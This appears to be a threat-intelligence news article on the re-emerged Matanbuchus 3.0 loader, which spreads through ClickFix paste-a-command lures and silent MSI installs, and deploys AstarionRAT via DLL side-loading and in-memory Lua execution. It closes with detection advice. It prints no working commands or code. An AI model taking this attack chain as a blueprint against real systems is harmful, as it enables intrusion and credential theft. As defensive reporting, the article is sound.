Matanbuchus, a prominent Malware-as-a-Service (MaaS) loader, has re-emerged in February 2026 after an extended absence of nearly a year. The latest version, Matanbuchus 3.0, boasts a complete code overhaul and now carries a substantial monthly subscription fee of up to $15,000, a significant increase from its previous pricing structure. This evolution suggests a strategic shift by its operators towards highly targeted, high-value operations rather than broad-scale spam campaigns. This sophisticated threat is employing the “ClickFix” social engineering tactic to compromise systems, bypassing traditional security measures by exploiting user trust.
The ClickFix technique tricks unsuspecting users into manually executing malicious commands by presenting fake browser errors or software update notifications. Victims are prompted to copy and paste specific PowerShell or Run dialog commands. The malicious URLs used in these attacks employ obfuscation techniques, including backslashes and path traversal sequences, to evade detection by logging systems. Because the user technically initiates the command execution, many standard email and perimeter defenses are circumvented. Once executed, the command triggers a silent installation process that proceeds without any visible user interface, making it difficult for users to detect.
Matanbuchus 3.0 Deploys AstarionRAT via Silent MSI Installations
Huntress analysts have identified that this renewed campaign deploys a novel payload, dubbed AstarionRAT, immediately following the initial infection. This custom remote access trojan is equipped with an array of twenty-four distinct commands, designed for comprehensive system compromise. These capabilities include credential theft and the establishment of SOCKS5 proxy connections, enabling further malicious activity. The impact of an AstarionRAT infection can be swift, with threat actors reportedly achieving lateral movement across a compromised network within forty minutes, often targeting domain controllers.
The ultimate objective of these Matanbuchus 3.0 attacks, according to security researchers, appears to be the deployment of ransomware or the exfiltration of sensitive data. This makes early detection and response absolutely critical for enterprise security teams aiming to mitigate potential damage. The use of silent MSI installations further enhances the stealth capabilities of the malware, making it a significant threat to organizations.
The Silent Infection Chain Leverages Deceptive Tactics
The infection mechanism employed by Matanbuchus 3.0 is intentionally layered to evade automated detection systems. It commences when a victim executes a mixed-case `msiexec` command, which is designed to fetch a payload from a newly registered domain. Upon execution, the installer places a legitimate, albeit vulnerable, Zillya Antivirus binary alongside a malicious DLL file. These files are strategically dropped into deceptive directories that mimic the names of legitimate vendors, such as “AegisLynx” or “DocuRay.”
To further mask its activities and evade analysis, the malware utilizes a renamed version of the 7-Zip utility. This tool is employed to extract a password-protected archive containing the subsequent stages of the attack. The malicious DLL is then injected and side-loaded by the antivirus engine, allowing it to decrypt and execute the core Matanbuchus loader. This intricate process culminates in the launch of an embedded Lua interpreter, which then executes the final AstarionRAT payload directly into memory.
This method of in-memory execution leaves minimal forensic artifacts on the disk, posing a challenge for incident responders attempting to reconstruct the attack. Security teams are advised to enhance their endpoint detection systems by configuring them to flag `msiexec` commands that incorporate mixed-case characters or exhibit suspicious URL patterns. It is crucial to monitor for the creation of unusual directories within the `%APPDATA%` environment and to scrutinize network connections to recently registered domains. Furthermore, comprehensive employee training is essential to educate staff on the dangers of pasting raw commands into their terminals, a key step in preventing manual infections.
The continued evolution and increased sophistication of malware loaders like Matanbuchus 3.0 underscore the persistent and adaptive nature of cyber threats. Organizations must remain vigilant and continuously update their security postures to counter these evolving attack vectors. The high subscription cost of Matanbuchus 3.0 suggests a growing demand for advanced MaaS solutions, and it is likely that similar threats leveraging sophisticated social engineering and stealthy deployment methods will continue to emerge.